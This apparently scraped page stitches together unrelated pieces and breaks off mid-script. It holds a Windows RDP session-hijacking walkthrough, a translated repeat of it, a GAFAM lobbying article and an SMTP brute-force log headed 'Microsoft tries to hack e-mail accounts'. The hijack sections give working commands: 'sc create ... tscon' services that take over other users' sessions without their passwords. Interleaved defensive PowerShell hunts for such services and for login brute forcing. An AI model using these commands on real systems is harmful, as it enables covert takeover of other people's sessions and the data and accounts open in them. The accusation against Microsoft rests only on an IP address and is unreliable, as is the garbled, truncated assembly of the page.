Session Hijacking All Windows versions

0-day or Feature? Privilege Escalation / Session Hijacking All Windows versions

* This post is periodically updated; all updates are at the end of the post.

Hey there,

Blog post in 20 seconds: fun with a sethc-backdoored host 🙂 somewhere on the internet:

Recently I've been playing with sethc/utilman logon-screen backdoors, and almost every time I used just the command line.
Occasionally I looked at the Users tab in Task Manager (taskmgr.exe), clicked the Connect button, and surprisingly got connected to the selected user's session.

When I checked it again with only local admin rights, it failed and asked for the user's password.
Why and how did that happen? Let's dig deeper.

In the relevant Microsoft documentation:
https://technet.microsoft.com/en-us/library/cc770988(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc731007(v=ws.11).aspx

we can see a couple of important remarks:

Remarks

  • You must have Full Control access permission or Connect special access permission to connect to another session.
  • The /dest:<SessionName> parameter allows you to connect the session of another user to a different session.
  • If you do not specify a password in the <Password> parameter, and the target session belongs to a user other than the current one, tscon fails (not really).

I've got it! The Sticky Keys (cmd) backdoor at the Windows login screen runs as NT AUTHORITY\SYSTEM, which has the Full Control access permission and can therefore connect to EVERY user session without being asked for a password.

So we've got session hijacking here. The funniest thing is that the legitimate user is not asked to log out: with this technique the user is simply kicked out of the session without any notification.

Vulnerability Details.

A privileged user who can gain command execution with NT AUTHORITY\SYSTEM rights can hijack any currently logged-in user's session without any knowledge of that user's credentials.
The Terminal Services session can be in either the connected or the disconnected state.

This is a high-risk vulnerability which allows any local admin to hijack a session and get access to:
1. A domain admin session.
2. Any unsaved documents the hijacked user is working on.
3. Any other systems/applications the hijacked user previously logged in to (this may include other Remote Desktop sessions, network share mappings, applications that require separate credentials, e-mail, etc.).

Example scenario:

Some bank employee has access to a billing system and has credentials to log in to it.
One day he comes to work, logs in to the billing system and starts working. At lunch time he locks his workstation and goes out to lunch.
Then the system administrator gets to the employee's workstation and logs in with his administrator account.
According to the bank's policy, the administrator's account should not have access to the billing system, but with a couple of built-in Windows commands this system administrator hijacks the employee's desktop, which was left locked. From then on, the sysadmin can perform malicious actions in the billing system under the billing employee's account.

There is a huge number of scenarios like this.

Furthermore, an attacker doesn't need tools like Metasploit, incognito, Mimikatz etc., which are commonly used for token manipulation and impersonating logged-in users. Everything is done with built-in commands. Every admin can impersonate any logged-in user, either locally with physical access or remotely via Remote Desktop (see PoC).

Feature (vulnerability) tested on:

Windows 2012 R2
Windows 2008
Windows 10
Windows 7

Proof of Concept:

The Microsoft documentation tells us how to do it from the command line.
All we need is an NT AUTHORITY\SYSTEM command prompt.
The easiest method is psexec, but it requires psexec.exe to be present:
psexec -s \\localhost cmd
Another method is to create a service that connects the selected session to ours.
1. Get information about all sessions:
C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

2. Create a service that will hijack the user's session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
3. Start the service:
net start sesshijack
Right after that, your session will be replaced with the target session.
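From the defender's side, the procedure above leaves two artifacts on the host: a service whose ImagePath runs tscon (System log event 7045) and a reconnect of the victim's account to a different session (Security log event 4778). The script below is an added example, not code from the original post; it hunts for both and lists the disconnected sessions that are the usual targets. It assumes the default System and Security logs, logon/logoff auditing enabled, and an elevated prompt (the Security log needs admin rights).

```powershell
# Added example (not from the original post): hunt for the traces of a tscon
# session hijack. Assumed: default System/Security logs, logon/logoff auditing
# enabled (event 4778 = "A session was reconnected to a Window Station"), and
# an elevated prompt.
param(
    [int]$LookbackHours = 24
)

$since = (Get-Date).AddHours(-$LookbackHours)

# Pull one named <Data> field out of an event record by its EventData name, so
# the script does not depend on the positional order of Properties[].
function Get-EventField {
    param(
        [System.Diagnostics.Eventing.Reader.EventRecord]$Event,
        [string]$Name
    )
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# 1. Service installs (System log, event 7045) whose ImagePath runs tscon.
#    Both procedures on this page (sesshijack / givemerdp) create such a service.
$tsconServices = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField -Event $_ -Name 'ImagePath') -match '(?i)\btscon(\.exe)?\b' } |
    ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = Get-EventField -Event $_ -Name 'ServiceName'
            ImagePath   = Get-EventField -Event $_ -Name 'ImagePath'
            Account     = Get-EventField -Event $_ -Name 'AccountName'
        }
    }

# 2. Session reconnects (Security log, event 4778). After a hijack the victim's
#    account is reconnected to a session name / client it did not log in from;
#    correlate these with the 7045 hits above and with 4624/4779 events.
$reconnects = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4778; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Account     = '{0}\{1}' -f (Get-EventField -Event $_ -Name 'AccountDomain'), (Get-EventField -Event $_ -Name 'AccountName')
            SessionName = Get-EventField -Event $_ -Name 'SessionName'
            ClientName  = Get-EventField -Event $_ -Name 'ClientName'
            ClientAddr  = Get-EventField -Event $_ -Name 'ClientAddress'
        }
    }

# 3. Sessions currently in the Disc state can be taken over without the owner
#    noticing. Listing them supports the usual mitigation: log off disconnected
#    sessions after a short time (GPO "Set time limit for disconnected sessions").
$disconnected = quser 2>$null | Where-Object { $_ -match '\sDisc\s' }

"== Services created with tscon in their ImagePath (last $LookbackHours h) =="
$tsconServices | Format-Table -AutoSize
"== Session reconnects (event 4778, last $LookbackHours h) =="
$reconnects | Format-Table -AutoSize
"== Disconnected sessions right now (potential hijack targets) =="
$disconnected
```

A 4778 event on its own is normal (every RDP reconnect produces one); the signal is a 4778 for one account shortly after a 7045 that installs a tscon service, or a reconnect whose ClientName differs from the victim's usual workstation. Note that a tscon run from a psexec -s shell creates no 7045 of its own, so the reconnect events are the more reliable trace.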

Proof of Concept video:

Windows 7 via Task Manager:

https://youtu.be/oPk5off3yUg

Windows 7 via command line:

https://youtu.be/VytjV2kPwSg

Windows 2012 R2 via service creation:

https://youtu.be/OgsoIoWmhWw

Update: this had already been found in 2011 (see the gentilkiwi post linked here), so it is a feature and not a zero-day: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

Update: if you still think this doesn't have high attack value, read Kevin Beaumont's great write-up about this feature:
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

Update: RedSnarf now supports RDP hijacking: https://www.youtube.com/watch?v=VrF8uXK_ePY

RDP session theft

When the system has all the rights, the game is up


You are the administrator of a server (or you have the rights ;)) and would like to take over an RDP session that is already open, was badly closed, or simply go and see why Paintbrush is open on a server?

Several options are open to us:

  • Connect via RDP to the server and pick up the session from the logon screen

    but you will need to know the session password to continue

  • Connect via RDP with your administrator account (then try a connection through Task Manager, for example)

    but you will need to know the session password to continue
 (same thing via tscon or the Remote Desktop Services manager)

  • Remote Assistance: by default, it is not automatic

    these options had to be set up beforehand, and they will not act on current sessions 🙁

Shall we ask the system for a hand?

The system is our friend

  1. Let's get the IDs of the sessions concerned: query session
    C:\Windows\system32>query session
     SESSION           UTILISATEUR              ID  ÉTAT    TYPE        PÉRIPHÉRIQUE
     services                                    0  Déco
     console                                     1  Conn
    >rdp-tcp#1         user1                     2  Actif   rdpwd
     rdp-tcp#0         gentilkiwi                3  Actif   rdpwd
     rdp-tcp                                 65536  Écouter

    rdp-tcp#0 is the session we want to steal; rdp-tcp#1 is our own open session.

  2. Let's quickly create a fake service (it will do the job):
    sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
  3. When it starts, the desktop switches over 🙂
    sc start givemerdp

    It can be removed with:

    sc delete givemerdp

This can of course be done more cleanly with PsExec (and its -s argument).

Tests I invite you to carry out:

  • Work with source RDP sessions that are inactive or whose Windows session has not been closed
  • Work with target RDP sessions that are not yet connected!
  • Use PsExec from an external prompt (without RDP)

 

Source: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

The far-reaching influence of the American giants

Documented relationships in Europe

Personal data protection, ride-hailing (VTC) regulation, tax scenarios: European and French legislation can have major effects on the American tech giants and their profits. To avoid budgetary setbacks, or to prepare legislation for their next innovations, these giants invest in lobbying. Nearly 13 million euros are spent on lobbying at the European level each year by Google, Microsoft, Facebook, Apple, Amazon, Twitter and Uber. Google and Microsoft are the ones declaring the largest annual budgets for lobbying activities in Europe, with spending of between 4.25 million and 4.5 million euros each year.

Lobbying in Europe

The commissioners' meetings

European commissioners are required to record every meeting they hold with lobbyists registered with the European Parliament. These meetings are compiled by Transparency International. They make it possible to see how, and with whom, the companies act. Together with Microsoft, Google is the company with the largest presence at the European institutions. Its lobbyists are also the ones who meet European commissioners or their cabinets most often.

Our compilation does not, however, take into account the associations in which these companies participate. A sort of super-lobby, they represent the interests of several companies and are richly funded. Examples are Digital Europe, which represents digital companies, and the CCIA (Computer & Communications Industry Association), which has held 34 meetings with commissioners in its own name since 2014.

Google and Microsoft

40% of the meetings are with the commissioners responsible for the digital single market and the digital economy. But Google and Microsoft visit everyone. Education, labour, research... Microsoft thus met the cabinet of the commissioner for home affairs to discuss "the use of new technologies in terms of security and the migration crisis". The company did not respond to our requests for details about this meeting or the new technologies it might offer in that context. And the ties are sometimes closer still: a study published in June showed that Google had hired nearly 70 European civil servants to do its lobbying.

Google dramatically increased its number of "revolving door" hires after 2011, when the European Commission launched its first antitrust investigation into the company. 18 of these hires were made in 2011, more than double the previous year.

A lack of transparency in France

Laws on lobbying are almost non-existent in France. Nobody records the meetings between those who write the laws and the lobbyists. Piece by piece, we have reconstructed some meetings between the executive branch and the American giants. Since the start of the five-year presidential term, we were able to identify 68 meetings, a third of which are between Google and the French executive. The most publicised meetings are those that give hours of lobbying a smiling conclusion: the signing of a contract between the Ministry of National Education and Microsoft in 2015, or the agreement between Google and the French press, signed with great pomp at the Élysée in February 2013.

Lobbying in France

Revolving doors

This discreet lobbying can count on the support of certain servants of the State who have left to work for Uber, Google or Twitter: this is what is called the revolving door. The latest case, announced on 14 January, concerns Benoît Loutrel, director general of Arcep, the telecoms regulator, who is joining Google's lobbying team. We analysed the career paths (mainly via LinkedIn, owned by Microsoft) of some twenty people who moved from the public sector to these companies. In 2015, for example, Uber recruited the former communications adviser to the Secretary of State for Transport, while Facebook can count on a former adviser to Nicolas Sarkozy at the Élysée.

These moves are almost unregulated and almost always approved. A framework, and transparency about the criteria, would make it possible to ensure that the employee does not profit from their time in the public sector. "Revolving door" moves can encourage the exchange of favours between large companies and the public sector.

Microsoft's ties

Since 2012, Microsoft has signed several contracts and agreements.

Microsoft is the only company among those studied to have received subsidies at the European level and to have been awarded public contracts, for a total of 23 million euros.

Room for improvement

As for meetings with executives and lobbyists, Axelle Lemaire, Secretary of State for Digital Affairs, published her agenda online in a machine-readable format until the middle of 2016. This good habit, which made it easy to follow her work, has unfortunately stopped. She now settles for an unusable PDF format. We had to comb through many agenda PDFs, not all of which were preserved, to retrieve each minister's agenda since the start of the term. As for members of parliament, nothing allows their appointments to be tracked. The Sapin 2 law, on transparency and the fight against corruption, passed in summer 2016, only provides for a register of lobbyists. Rather poor arrangements, compared with the United States and Canada. Yet such transparency would make it easier to understand everyone's interests in the legislation under discussion.

source: https://github.com/alphoenix/donnees/tree/master/lobbies-gafamut#des-relations-documentées-en-europe

Microsoft tries to hack e-mail accounts.

Someone at Microsoft is trying to hack e-mail accounts.

Fri 2016-09-02 09:42:47.165: 05: Session 995785; child 0001
Fri 2016-09-02 09:42:47.165: 05: Accepting SMTP connection from 104.41.137.35:56636 to **.**.**.**:25
Fri 2016-09-02 09:42:47.183: 03: --> 220-******** ESMTP; Fri, 02 Sep 2016 09:42:47 +0200
Fri 2016-09-02 09:42:47.183: 03: --> 220-****************************************
Fri 2016-09-02 09:42:47.183: 03: --> 220-* Spammers will be blocked for ever           *
Fri 2016-09-02 09:42:47.183: 03: --> 220-* We block spammers by whole IP scopes  *
Fri 2016-09-02 09:42:47.183: 03: --> 220-* Any attemps to hack locks the ip forever *
Fri 2016-09-02 09:42:47.183: 03: --> 220-****************************************
Fri 2016-09-02 09:42:47.266: 02: <-- EHLO WS12R2Std01
Fri 2016-09-02 09:42:47.268: 03: --> 250-****.info Hello WS12R2Std01, pleased to meet you
Fri 2016-09-02 09:42:47.268: 03: --> 250-ETRN
Fri 2016-09-02 09:42:47.268: 03: --> 250-AUTH LOGIN CRAM-MD5 PLAIN
Fri 2016-09-02 09:42:47.268: 03: --> 250-8BITMIME
Fri 2016-09-02 09:42:47.268: 03: --> 250-ENHANCEDSTATUSCODES
Fri 2016-09-02 09:42:47.268: 03: --> 250-STARTTLS
Fri 2016-09-02 09:42:47.450: 04: Failed SMTP authentication attempt from 104.41.137.35 for "info@****.***"
Fri 2016-09-02 09:42:47.450: 03: --> 535 5.7.8 Authentication failed
Fri 2016-09-02 09:42:47.532: 02: <-- AUTH PLAIN ******
Fri 2016-09-02 09:42:47.533: 04: Failed SMTP authentication attempt from 104.41.137.35 for "info@****.***"
Fri 2016-09-02 09:42:47.533: 03: --> 535 5.7.8 Authentication failed
Fri 2016-09-02 09:42:47.537: 04: SMTP session terminated (Bytes in/out: 148/870)

There were 151 attempts. Well done, #Microsoft:

Fri 2016-09-02 10:23:53.361: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:23:53.692: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:23:53.693: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:08.790: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:08.976: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.151: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.322: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.495: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.669: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.854: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.029: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.373: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.374: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.466: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.640: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.815: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.999: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.173: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.357: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.532: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.704: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.964: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.965: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.064: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.234: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.407: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.581: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.752: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.922: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.094: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.266: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.503: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.504: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:58.615: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:58.791: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:58.962: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.135: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.305: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.480: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.670: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.870: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:00.124: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:00.125: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.286: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.461: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.647: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.820: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.004: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.177: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.349: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.540: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.796: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.797: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:31.896: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.072: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.261: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.447: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.636: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.819: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.005: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.181: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.432: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.433: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:48.709: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:48.881: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.072: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.258: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.447: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.631: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.816: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.995: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:50.249: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:50.249: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:26:05.359: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.531: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.702: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.874: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.051: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.233: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.407: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.580: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.835: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.835: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:21.923: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.102: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.284: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.460: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.643: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.815: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.988: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.159: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.623: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.624: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:38.730: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:38.915: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.090: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.279: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.465: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.639: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.824: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.995: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:40.367: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:40.369: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:55.470: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:55.641: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:55.817: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.002: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.175: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.346: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.518: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.690: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.955: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.956: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.114: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.294: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.476: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.665: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.835: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.008: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.181: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.352: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.627: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.628: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:28.754: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:28.939: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.110: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.281: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.454: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.627: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.796: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.969: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:30.255: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:30.255: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.361: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.536: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.719: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.894: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.097: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.288: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.490: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.673: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.968: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.969: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:28:02.203: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.374: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.561: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.736: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.922: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.095: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.268: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.453: Dynamic screening refused 104.41.137.35; 435 minutes remain
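The "Dynamic screening refused" lines above are the mail server's own rate limiting kicking in after repeated AUTH failures from one address. The script below is an added example, not part of the original post: it replays lines in the same format and flags a source IP once a configurable number of failed authentication attempts falls within a sliding time window, which is the decision the server made automatically. The sample lines are constructed; the addresses and mailboxes are placeholders, not the ones from the log.

```powershell
# Added example (not from the original post): detect SMTP AUTH brute forcing
# from log lines in the format shown above. Sample lines are constructed.
$sampleLog = @'
Fri 2016-09-02 09:42:47.450: 04: Failed SMTP authentication attempt from 192.0.2.10 for "info@example.invalid"
Fri 2016-09-02 09:42:47.533: 04: Failed SMTP authentication attempt from 192.0.2.10 for "info@example.invalid"
Fri 2016-09-02 09:43:01.002: 04: Failed SMTP authentication attempt from 192.0.2.10 for "sales@example.invalid"
Fri 2016-09-02 09:43:15.118: 04: Failed SMTP authentication attempt from 192.0.2.10 for "admin@example.invalid"
Fri 2016-09-02 09:43:30.207: 04: Failed SMTP authentication attempt from 192.0.2.10 for "info@example.invalid"
Fri 2016-09-02 09:44:00.000: 02: <-- QUIT
Fri 2016-09-02 09:50:12.900: 04: Failed SMTP authentication attempt from 198.51.100.7 for "bob@example.invalid"
Fri 2016-09-02 11:20:00.000: 04: Failed SMTP authentication attempt from 198.51.100.7 for "bob@example.invalid"
'@ -split "`r?`n"

function Get-SmtpAuthBruteForce {
    param(
        [string[]]$Lines,
        [int]$Threshold = 5,       # failures that trigger a block ...
        [int]$WindowMinutes = 10   # ... when they fall within this many minutes
    )
    # Accept straight or typographic quotes around the mailbox, as in the excerpt.
    $pattern = '^\w{3} (?<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}): \d{2}: ' +
               'Failed SMTP authentication attempt from (?<ip>[\d.]+) for ["“](?<user>[^"”]+)["”]'

    $failures = foreach ($line in $Lines) {
        if ($line -match $pattern) {
            [pscustomobject]@{
                Time = [datetime]::ParseExact($Matches.ts, 'yyyy-MM-dd HH:mm:ss.fff', [cultureinfo]::InvariantCulture)
                Ip   = $Matches.ip
                User = $Matches.user
            }
        }
    }

    foreach ($group in ($failures | Group-Object Ip)) {
        $events = @($group.Group | Sort-Object Time)
        # Sliding window: any run of $Threshold consecutive failures inside the window trips the block.
        $block = $false
        for ($i = 0; $i + $Threshold - 1 -lt $events.Count; $i++) {
            $span = $events[$i + $Threshold - 1].Time - $events[$i].Time
            if ($span.TotalMinutes -le $WindowMinutes) { $block = $true; break }
        }
        [pscustomobject]@{
            Ip        = $group.Name
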